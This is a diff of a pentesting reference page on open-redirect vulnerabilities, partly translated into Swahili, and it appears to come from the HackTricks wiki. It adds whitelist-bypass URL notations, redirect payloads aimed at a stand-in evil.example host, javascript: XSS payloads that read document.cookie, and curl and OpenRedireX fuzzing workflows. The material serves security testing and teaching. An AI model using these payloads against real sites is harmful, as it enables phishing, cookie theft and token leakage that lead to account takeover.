Translated ['src/pentesting-web/open-redirect.md'] to sw

src/pentesting-web/open-redirect.md

@@ -7,12 +7,23 @@
 
 ### Redirect to localhost or arbitrary domains
 
+- Ikiwa app “allows only internal/whitelisted hosts”, jaribu alternative host notations ili kufikia loopback au internal ranges kupitia redirect target:
+- Varianti za IPv4 loopback: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
+- Varianti za IPv6 loopback: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
+- Trailing dot na casing: localhost., LOCALHOST, 127.0.0.1.
+- Wildcard DNS zinazorejelea loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Hizi ni muhimu wakati tu “subdomains of X” zinazoruhusiwa lakini host resolution bado inaonyesha 127.0.0.1.
+- Network-path references mara nyingi hupita naive validators ambazo zinapanga scheme au kuangalia tu prefixes:
+- //attacker.tld → humaeleweka kama scheme-relative na hupeleka mtumiaji nje ya tovuti kwa scheme ya sasa.
+- Mbinu za userinfo zinavunja checks za contains/startswith dhidi ya trusted hosts:
+- https://trusted.tld@attacker.tld/ → browser hupeleka mtumiaji kwenye attacker.tld lakini ukaguzi rahisi wa string unaona trusted.tld.
+- Mkanganyiko wa parsing wa backslash kati ya frameworks/browsers:
+- https://trusted.tld\@attacker.tld → baadhi ya backends huchukulia “\” kama char ya path na hupitisha validation; browsers hu-normalize hadi “/” na hutafsiri trusted.tld kama userinfo, kupeleka watumiaji kwenye attacker.tld. Hii pia inaonekana katika mismatches ya URL-parser za Node/PHP.
 
 {{#ref}}
 ssrf-server-side-request-forgery/url-format-bypass.md
 {{#endref}}
 
-### Open Redirect to XSS
+### Modern open-redirect to XSS pivots
 ```bash
 #Basic payload, javascript code is executed after "javascript:"
 javascript:alert(1)
@@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
 /x:1/:///%01javascript:alert(document.cookie)/
 ";alert(0);//
 ```
-## Open Redirect kupakia faili za svg
+<details>
+<summary>URL-based bypass payloads za kisasa zaidi</summary>
+```text
+# Scheme-relative (current scheme is reused)
+//evil.example
+
+# Credentials (userinfo) trick
+https://trusted.example@evil.example/
+
+# Backslash confusion (server validates, browser normalizes)
+https://trusted.example\@evil.example/
+
+# Schemeless with whitespace/control chars
+evil.example%00
+%09//evil.example
+
+# Prefix/suffix matching flaws
+https://trusted.example.evil.example/
+https://evil.example/trusted.example
+
+# When only path is accepted, try breaking absolute URL detection
+/\\evil.example
+/..//evil.example
+```
+
+```
+</details>
+
+## Open Redirect uploading svg files
+
 ```html
 <code>
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
@@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
 </svg>
 </code>
 ```
-## Vigezo vya kawaida vya kuingiza
+
+## Common injection parameters
+
 ```
 /{payload}
 ?next={payload}
@@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
 Redirect=https://c1h2e1.github.io
 ReturnUrl=https://c1h2e1.github.io
 ```
-## Mifano ya msimbo
+
+## Code examples
 
 #### .Net
+
 ```bash
 response.redirect("~/mysafe-subdomain/login.aspx")
 ```
+
 #### Java
+
 ```bash
 response.redirect("http://mysafedomain.com");
 ```
+
 #### PHP
+
 ```php
 <?php
 /* browser redirections*/
@@ -161,16 +209,71 @@ header("Location: http://mysafedomain.com");
 exit;
 ?>
 ```
-## Tools
+
+## Hunting and exploitation workflow (practical)
+
+- Single URL check with curl:
+
+```bash
+curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
+```
+
+- Discover and fuzz likely parameters at scale:
+
+<details>
+<summary>Click to expand</summary>
+
+```bash
+# 1) Kusanya URLs za kihistoria, zihifadhi zile zilizo na common redirect params
+cat domains.txt \
+| gau --o urls.txt            # or: waybackurls / katana / hakrawler
+
+# 2) Grep common parameters na sawazisha orodha
+rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
+| sed 's/\r$//' | sort -u > candidates.txt
+
+# 3) Tumia OpenRedireX to fuzz with payload corpus
+cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
+
+# 4) Thibitisha kwa mkono hits zinazovutia
+awk '/30[1237]|Location:/I' results.txt
+```
+```
+</details>
+
+- Usisahau client-side sinks katika SPAs: angalia window.location/assign/replace na framework helpers zinazosomea query/hash na kufanya redirect.
+
+- Frameworks mara nyingi huleta footguns wakati redirect destinations zinapotokana na input isiyo ya kuaminika (query params, Referer, cookies). Angalia maelezo ya Next.js kuhusu redirects na epuka dynamic destinations zinazotokana na user input.
+
+- OAuth/OIDC flows: abusing open redirectors frequently escalates to account takeover by leaking authorization codes/tokens. See dedicated guide:
+
+{{#ref}}
+./oauth-to-account-takeover.md
+{{#endref}}
+
+- Majibu ya server yanayotumia redirects bila Location (meta refresh/JavaScript) bado yanaweza kutumiwa kwa phishing na wakati mwingine yanaweza kuunganishwa (chained). Grep for:
+```html
+<meta http-equiv="refresh" content="0;url=//evil.example">
+<script>location = new URLSearchParams(location.search).get('next')</script>
+```
+## Zana
 
 - [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
+- OpenRedireX – fuzzer ya kugundua open redirects. Mfano:
+```bash
+# Install
+git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
 
-## Resources
+# Fuzz a list of candidate URLs (use FUZZ as placeholder)
+cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
+```
+## Marejeo
 
-- Katika [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) unaweza kupata orodha za fuzzing.
+- Kwenye https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect unaweza kupata orodha za fuzzing.
 - [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
 - [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 - [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
-
+- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
+- OpenRedireX – A fuzzer for detecting open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
 
 {{#include ../banners/hacktricks-training.md}}